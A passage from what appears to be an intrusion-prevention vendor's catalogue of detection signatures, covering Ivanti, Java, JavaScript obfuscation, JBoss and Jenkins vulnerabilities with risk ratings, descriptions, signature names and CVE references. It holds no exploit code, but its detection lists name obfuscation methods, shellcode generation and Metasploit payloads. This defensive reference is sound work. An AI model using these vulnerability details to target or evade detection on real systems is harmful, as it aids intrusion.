Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability have been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager and can be exploited without authentication. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: File-TextId_Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection
References:
CVE-2024-29827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29827
Back to top

Ivanti-EPM-Agent-Portal-Command-Execution

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1803-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Directory Traversal
Description: Insufficient validation of received data causes a command execution vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute abitrary code on the target system.
Situation: Generic_CS-Ivanti-EPM-Agent-Portal-Command-Execution
References:
CVE-2023-28324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28324
Back to top

Ivanti-EPM-RecordGoodApp-SQLi-RCE

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Risk: High
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Windows
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: A vulnerability in Ivanti Endpoint Manager, versions 2022 SU5 and prior, which allows remote attackers to execute arbitrary code on the target server, due to the the lack of proper validation of a user-supplied string before using it to construct SQL queries.
Situation: HTTP_CRL-Ivanti-EPM-RecordGoodApp-SQLi-RCE
References:
CVE-2024-29824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29824
Back to top

Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035

About this vulnerability: A vulnerability in Ivanti MobileIron Sentry
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Generic
Software: Ivanti MobileIron Sentry
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Ivanti MobileIron Sentry versions up to and including 9.18.0. Unauthenticated remote attackers can use this vulnerability to execute arbitrary code due to an insufficiently restricted API endpoint.
Situation: HTTP_CRL-Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035
References:
CVE-2023-38035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38035
Back to top

Ivanti-Virtual-Traffic-Manager-Authentication-Bypass-CVE-2024-7593

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Virtual Traffic Manager detected
Risk: High
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1776-5242
Platform: Generic
Software: Ivanti Virtual Traffic Manager
Type: Input Validation
Description: Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
Situation: HTTP_CRL-Ivanti-Virtual-Traffic-Manager-Authentication-Bypass
References:
CVE-2024-7593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7593
Back to top

Jaff-Ransomware

About this vulnerability: Jaff Ransomware
Risk: High
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: Jaff ransomware spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the Jaff ransomware.
Situation: File-PDF_Suspected-Jaff-Ransomware-PDF
Back to top

Jana-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Jana HTTP server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: T. Hauck Jana Webserver
Type: Malfunction
Description: Jana HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request specifying a MSDOS device name to the server to cause the server to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2001-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558
BID-2704
http://www.securityfocus.com/bid/2704
OSVDB-1817
http://www.osvdb.org/1817
Back to top

Jason-Maloneys-Cgi-Guestbook-Command-Execution

About this vulnerability: Jason Maloneys Cgi Guestbook Command Execution
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Jason Maloney's CGI Guestbook
Type: Input Validation
Description: There exists a vulnerability in Jason Maloney's CGI Guestbook that can allow a remote attacker to execute commands.
Situation: HTTP_CRL-Jason-Maloneys-Cgi-Guestbook-Command-Execution
Back to top

Jasper-Jp2_Decode-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in JasPer
Risk: High
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: JasPer; Imagemagick
Type: Malfunction
Description: There exists an out-of-bounds array indexing vulnerability in JasPer. A remote attacker can use this to cause a denial of service condition or in the worst case gain access to sensitive information.
Situation: File-JPEG_Jasper-Jp2_Decode-Out-Of-Bounds-Read
References:
CVE-2017-9782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9782
BID-99171
http://www.securityfocus.com/bid/99171
Back to top

JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430

About this vulnerability: A vulnerability in JasperReports Server
Risk: Moderate
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: JasperSoft
Type: Input Validation
Description: A path traversal vulnerability has been reported in TIBCO JasperReports Server, Jaspersoft for AWS with Multi-Tenancy, and Jaspersoft Reporting and Analytics for AWS. An attacker with low user privileges could use this vulnerability to read arbitrary files and possibly execute code via local file inclusion.
Situation: HTTP_CSU-JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430
References:
CVE-2018-5430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5430
Back to top

JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809

About this vulnerability: A vulnerability in JasperReports Server
Risk: Moderate
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: JasperSoft
Type: Input Validation
Description: A path traversal vulnerability has been reported in TIBCO JasperReports Library, JasperReports Server, JasperReports Server for ActiveMatrix BPM, Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS.
Situation: HTTP_CSU-JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809
References:
CVE-2018-18809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18809
Back to top

Java-Archive-File-Upload

About this vulnerability: Java archive file upload detected
Risk: Moderate
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This situation can be used to disable uploading Java archive files to a web server to mitigate vulnerabilities like CVE-2016-1000031.
Situation: File-Binary_Java-Archive-File-Upload
Back to top

Java-Color-Management-Component-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle Java
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: A vulnerability in Oracle Java Color Management Component allows remote attacker to run arbitrary code in target environment.
Situation: File-Binary_Java-Color-Management-Component-Remote-Code-Execution
References:
CVE-2013-1493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493
BID-58238
http://www.securityfocus.com/bid/58238
OSVDB-90737
http://www.osvdb.org/90737
Back to top

Java-Deserialization-Privilege-Escalation

About this vulnerability: A Java Deserialization Privilege Escalation vulnerability.
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE
Type: Insecure Configuration
Description: A vulnerability in the Oracle Java Runtime Environment component of Oracle Java SE, versions 6 Update 18 and 5.0 Update 23, which allows remote attackers to to deserialize a MarshalledObject containing a custom classloader under a privileged context.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2010-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094
OSVDB-63484
http://www.osvdb.org/63484
Back to top

Java-MixerSequencer-Buffer-Overflow

About this vulnerability: A Java MixerSequencer Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Java Runtime Environment
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Oracle Java Runtime Environment, versions 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27, which allows remote attackers to execute arbitrary code via crafted MixerSequencer objects.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2010-0842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842
BID-39077
http://www.securityfocus.com/bid/39077
OSVDB-63493
http://www.osvdb.org/63493
Back to top

Java-Related-File-Transfers

About this vulnerability: A Java-related file transfer was detected
Risk: Moderate
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Insecure Configuration
Description: A Java-related file transfer was detected
Situation: File-Binary_Java-Class-File
File-Zip_JAR-File-Detected
File-TextId_Java-Web-Start
Back to top

Java-Rmi-Remote-Command-Execution

About this vulnerability: A Java Rmi Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE
Type: Input Validation
Description: A vulnerability in Oracle Java SE RMI Registry and RMI Activation services, which allow loading classes from any remote URL, which can result in a system compromise.
Situation: Generic_CS-Java-Rmi-Remote-Command-Execution
Back to top

Java-Runtime-Environment-JAX-WS-Remote-Code-Execution

About this vulnerability: A Java Runtime Environment JAX-WS Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Insecure Configuration
Description: A vulnerability in Oracle Java Runtime Environment, SE 7 Update 7 and earlier, which allows remote attackers to execute arbitrary java code outside the sandbox.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2012-5076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5076
BID-56054
http://www.securityfocus.com/bid/56054
OSVDB-86363
http://www.osvdb.org/86363
Back to top

Java-Runtime-Environment-Remote-Code-Execution

About this vulnerability: A Java Runtime Environment Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Insecure Configuration
Description: A vulnerability in Oracle Java Runtime Environment, SE 7 Update 7 and earlier, which allows remote attackers to execute arbitrary java code outside the sandbox.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2012-5088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088
BID-56057
http://www.securityfocus.com/bid/56057
OSVDB-86352
http://www.osvdb.org/86352
Back to top

Java-Trusted-Method-Chain-Privilege-Escalation

About this vulnerability: A Java Trusted Method Chain Privilege Escalation vulnerability.
Risk: High
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Insecure Configuration
Description: A vulnerability in Oracle Java Runtime Environment, versions 6 prior to update 19 and version 5 prior to update 23, which allows remote attackers to run an untrusted method in a privileged context.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2010-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840
OSVDB-63483
http://www.osvdb.org/63483
Back to top

Java-Unsigned-Applet-Execution

About this vulnerability: A vulnerability in Java Runtime Environment
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Input Validation
Description: A vulnerability in the Java Runtime Environment allows an attacker to run an applet outside of the Java Sandbox, by using a a trusted directory as "codebase" parameter, and a URL without dots as "code" parameter.
Situation: HTTP_SS-Java-Unsigned-Applet-Execution
File-Zip_Metasploit-Shellcode-JAR
File-Text_Java-Unsigned-Applet-Execution
References:
CVE-2010-4452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4452
Back to top

JavaScript-Create-Noscript-Element

About this vulnerability: Attempts to generate noscript elements in JavaScript
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Attempts to create noscript-tags with javascript often indicate efforts to hide malicious code. Some browsers can also malfunction with such conflicting instructions.
Situation: File-Text_JavaScript-Create-Noscript-Element
Back to top

JavaScript-In-OLE

About this vulnerability: An OLE file with embedded JavaScript detected
Risk: Moderate
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An OLE file with embedded JavaScript was seen. Embedded JavaScript in an OLE file can be completely legitimate but it can also be used for malicious purposes.
Situation: File-OLE_Embedded-JavaScript-Obfuscated-Unescape-Function
File-OLE_Embedded-JavaScript-Obfuscated-Eval-Function
File-OLE_Embedded-JavaScript-In-OLE
Back to top

JavaScript-In-PDF

About this vulnerability: Javascript in PDF file
Risk: Low
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-1607-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: Javascript has been detected inside a PDF document. This in perfectly normal, but imposes some risks that are unwanted in certain organisations.
Situation: E-Mail_BS-JavaScript-In-PDF
E-Mail_BS-JavaScript-With-Open-Action-In-PDF
HTTP_SS-JavaScript-In-PDF
HTTP_SS-JavaScript-With-Open-Action-In-PDF
File-PDF_JavaScript-In-PDF
File-PDF_JavaScript-With-Open-Action-In-PDF
File-PDF_JavaScript-With-Unescape-In-PDF
File-PDF_JavaScript-Suspicious-Variable-Name
File-PDF_Docm-File-And-JavaScript-In-PDF
Back to top

JavaScript-Obfuscated-With-Hangul-Filler-Characters

About this vulnerability: A suspicious webpage containing obfuscated JavaScript detected
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: This fingerprint detects the JavaScript code that was obfuscated using invisible Hangul Filter unicode characters. Such obfuscation technique has been actively abused in phishing attacks.
Situation: File-Text_JavaScript-Obfuscated-With-Hangul-Filler-Characters
Back to top

JavaScript-Obfuscation

About this vulnerability: A script obfuscation method using JavaScript
Risk: Moderate
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Generic HTTP client
Type: Javascript Injection
Description: Most web browsers contain an embedded JavaScript interpreter. The interpreter allows a script to use various operations such as the exclusive or (XOR) for a block of data and pass the processed data back to the interpreter for execution. This feature enables a script to hide its real activity from inspection, and may be used to evade detection.
Situation: HTTP_SS-JavaScript-Xor-Obfuscation-Method
HTTP_SS-JavaScript-Escaped-Obfuscation-Method
HTTP_SS-JavaScript-Dual-Custom-Function-Obfuscation-Method
HTTP_SS-JavaScript-Packed-Obfuscation-Method
HTTP_SS-JavaScript-Xor-One-Time-Pad-Obfuscation-Method
HTTP_SS-JavaScript-Unescape-Obfuscation-Method-2
HTTP_SS-JavaScript-Unescape-Obfuscation-Method
File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected-2
File-Text_Decimal-Encoded-JavaScript-2
File-Text_JavaScript-Unescape-Obfuscation-Access-With-Outdated-Browser
File-Text_Wordpress-Suspicious-JavaScript-Iframe-Injection
File-Text_Reverse-Obfuscated-Script
File-Text_JavaScript-Split-Comment-Obfuscation
File-Text_JavaScript-Reference-To-Program-Files-Resource
File-Text_JavaScript-Eval-Function-Overridden
File-Text_Suspicious-JScript-In-XML
File-Text_Decimal-Encoded-JavaScript
File-Text_Embedded-Assembly-Obvuscated-JavaScript
File-Text_JavaScript-Strings-Reverse-Encoded
File-Text_Malicious-VBScript-Detected
File-Text_Encoded-JavaScript-Detected
File-Text_Code-Protect-Obfuscated-JavaScript-Detected
File-Text_QZX-Obfuscated-JavaScript-Detected
File-Text_Jfogs-Obfuscated-JavaScript-Detected
File-Text_Jjencode-Obfuscated-JavaScript-Detected
File-Text_Aaencode-Obfuscated-Script-Detected
File-Text_JavaScript-FromCharCode-Obfuscation-Detected
File-Text_JavaScript-FromCharCode-Obfuscation-Detected-2
File-Text_Hex_Encoded_Url_Detected
File-Text_JS-Obfuscator-Obfuscated-JavaScript-Detected
File-Text_Script-Encoder-Obfuscated-Script-Detected
File-Text_JS-Obfuscator-Obfuscated-Malicious-JavaScript-Detected
File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected
File-PDF_JavaScript-Packed-Obfuscation-Method
File-PDF_JavaScript-Unescape-Obfuscation-Method-2
File-PDF_JavaScript-Eval-Obfuscation-Method
File-Text_JavaScript-Xor-Obfuscation-Method
File-Text_JavaScript-Escaped-Obfuscation-Method
File-Text_JavaScript-Dual-Custom-Function-Obfuscation-Method
File-Text_JavaScript-Packed-Obfuscation-Method
File-Text_JavaScript-Xor-One-Time-Pad-Obfuscation-Method
File-Text_JavaScript-Unescape-Obfuscation-Method
File-Text_JavaScript-Unescape-Obfuscation-Method-2
File-Text_JavaScript-Cookie-Xor-Obfuscation-Method
File-Text_JavaScript-ActiveX-Class-Id-Obfuscation
File-Text_JavaScript-Replace-Obfuscation
File-Text_JavaScript-Alert-Exception-Obfuscation
File-Text_JavaScript-Suspicious-External-Reference
File-Text_JavaScript-ActiveX-Obfuscation
File-Text_JavaScript-Object-Instantiation-Obfuscation
File-Text_JavaScript-String-Split-Obfuscation
File-Text_JavaScript-Innerhtml-Property-Obfuscation
File-Text_Generic-JavaScript-Obfuscator
File-Text_JavaScript-String-Value-Obfuscation
File-Text_JavaScript-Document-Object-Obfuscation
File-Text_JScript-Obfuscated-Reference
File-Text_Hex-Encoded-String-In-Script-File
File-Text_Malicious-Obfuscated-Script-File
File-Text_Script-From-A-Suspicious-Site
File-Text_JavaScript-Obfuscation-Method-Detected
File-Text_VBScript-Execute-Chr-Obfuscation
File-Text_VBScript-Array-Chr-Obfuscation
File-Text_JavaScript-Inline-Comment-Obfuscation
File-Text_JavaScript-Split-With-Non-Ascii-Separator
Back to top

JavaScript-ShellCode-Generation

About this vulnerability: Suspicious JavaScript code
Risk: Moderate
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Malfunction
Description: JavaScript is a powerful programming language that is embedded into web browsers. It can be used to generate and hide shellcode that is used in exploits against the browser.
Situation: HTTP_SS-JavaScript-ShellCode-Generation
HTTP_SS-JavaScript-ShellCode-Generation-2
HTTP_SS-JavaScript-ShellCode-Generation-3
HTTP_SS-JavaScript-ShellCode-Generation-4
File-Text_JavaScript-ShellCode-Generation
File-Text_JavaScript-ShellCode-Generation-2
File-Text_JavaScript-ShellCode-Generation-3
File-Text_JavaScript-ShellCode-Generation-4
Back to top

JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

About this vulnerability: Multiple encodings used with JavaScript String.fromCharCode detected
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Multiple encodings used with the JavaScript String.fromCharCode function.
Situation: HTTP_SS-JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
Back to top

JavaScript-Suspicious-Function-Name

About this vulnerability: A suspicious function name in script was detected
Risk: High
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: A suspicious function name in script was detected.
Situation: File-Text_HTML-Suspicious-Function-Name
File-Text_JavaScript-Suspicious-Function-Name-Exploit
File-Text_JavaScript-Suspicious-Function-Name-Crash
File-Text_JavaScript-Suspicious-Function-Name-Heapspray
Back to top

JavaScript_Injected-Wordpress

About this vulnerability: JavaScript malicious redirection in wordpress sites
Risk: Moderate
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Windows
Software: <os>
Type: Javascript Injection
Description: Traffic that resembles known injected JavaScript pattern detected. The malicious script has been observed to be injected into vulnerable WordPress sites, where it redirects to malicious sites
Situation: File-Text_JavaScript_Injected-Wordpress
Back to top

JAWS-Command-Execution

About this vulnerability: A vulnerability in JAWS
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: JAWS
Type: Malfunction
Description: There exists a remote code execution vulnerability in JAWS content management system. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-JAWS-Command-Execution
Back to top

Jboss-Authentication-Bypass

About this vulnerability: A Jboss Authentication Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: JBoss
Type: Insecure Configuration
Description: A vulnerability in JBoss, versions 4.x and 5.x, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Situation: HTTP_CRL-Jboss-Authentication-Bypass
References:
CVE-2007-1036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1036
OSVDB-33744
http://www.osvdb.org/33744
Back to top

Jboss-EAP/AS-Remoting-Unified-Invoker-RCE

About this vulnerability: A vulnerability in JBoss.
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: JBoss
Type: Code Injection
Description: A vulnerability in JBOSS EAP/AS, versions 6.x and before, which allows remote attackers to execute arbitrary code by sending a serialized object to the interface.
Back to top

Jboss_Seam_2_Code_Injection

About this vulnerability: A vulnerability in JBoss Seam 2
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat JBoss Enterprise Application Platform
Type: Code Injection
Description: A vulnerability in JBoss Seam 2 where input for the JBoss Expression Language Expressions are not properly sanitized, giving remote attackers the ability to execute arbitrary code via a crafted URL.
Situation: HTTP_CSU-Jboss_Seam_2_Code_Injection
References:
CVE-2010-1871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871
BID-41994
http://www.securityfocus.com/bid/41994
OSVDB-66881
http://www.osvdb.org/66881
Back to top

Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Active Choices Plugin
Risk: Moderate
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: Jenkins Active Choices Plugin
Type: Input Validation
Description: Insufficient validation of parameter names causes a cross-site scripting vulnerability in the Active Choices Plugin for Jenkins.
Situation: File-Text_Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting
References:
CVE-2021-21699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21699
Back to top

Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Active Choices Plugin
Risk: Moderate
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Jenkins Active Choices Plugin. This vulnerability is due to insufficient validation of referencedParameters values shown in the Build with Parameters page of the configured job. A remote, authenticated attacker could exploit this vulnerability by sending a crafted message to a vulnerable server. Successful exploitation could result in execution of script code in the security context of target user's browser.
Situation: HTTP_CRL-Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21616
Back to top

Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Amazon EC2 plugin for Jenkins
Risk: High
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: There exists a vulnerability in the Amazon EC2 plugin for Jenkins, versions 1.50.1 and before, which allows remote attackers to provision Amazon EC2 instances with attacker specified template IDs, due to the lack of CSRF protection mechanism on certain endpoints handled by the plugin.
Situation: HTTP_CSU-Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery
References:
CVE-2020-2186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2186
Back to top

Jenkins-Arbitrary-File-Read-CVE-2024-23897

About this vulnerability: A vulnerability in Jenkins
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1836-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: An arbitrary file read vulnerability has been reported in Jenkins. An unauthenticated attacker can use this vulnerability to access sensitive information via the Jenkins CLI, which can lead to remote code execution.
Situation: File-Text_Xstream-Unsafe-Deserialization
WebSocket_CS-Jenkins-Arbitrary-File-Read-CVE-2024-23897
File-Binary_Jenkins-Arbitrary-File-Read-CVE-2024-23897
References:
CVE-2024-23897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23897
Back to top

Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Artifact Repository Parameter Plugin
Risk: Moderate
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Platform: Generic
Software: Jenkins Artifact Repository Parameter Plugin
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in Jenkins Artifact Repository Parameter plugin. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21622
Back to top

Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Badge Plugin
Risk: Moderate
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: Jenkins Badge Plugin
Type: Input Validation
Description: Insufficient validation of inputs causes a cross-site scripting vulnerability in the Badge plugin for Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-23108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23108
Back to top

Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Build Monitor View Plugin
Risk: Moderate
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the Jenkins plugin Build Monitor View. This vulnerability is due to improper input validation when handling build monitor view names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2024-28156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28156
Back to top

Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins Build With Parameters Plugin
Risk: Moderate
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: Insufficient validation of the name and description properties in requests sent to the Build With Parameters plugin causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-21628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21628
Back to top

Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting

About this vulnerability: A vulnerability in Jenkins build-metrics Plugin
Risk: Moderate
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in build-metrics plugin of Jenkins CI. The vulnerability is due to the fact that the template used to render the output for the build-metrics plugin has HTML escaping disabled. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting
References:
CVE-2019-10475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10475
Back to top

Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization

About this vulnerability: A vulnerability in Jenkins Jenkins
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jenkins
Type: Malfunction
Description: An insecure deserialization vulnerability has been reported in Jenkins CI Server. This vulnerability is due to deserialization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the security context of the System user.
Situation: Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization
References:
CVE-2015-8103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103
BID-77636
http://www.securityfocus.com/bid/77636
Back to top

Jenkins-Ci-Server-Getorcreate-Policy-Bypass

About this vulnerability: A vulnerability in Jenkins
Risk: Moderate
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
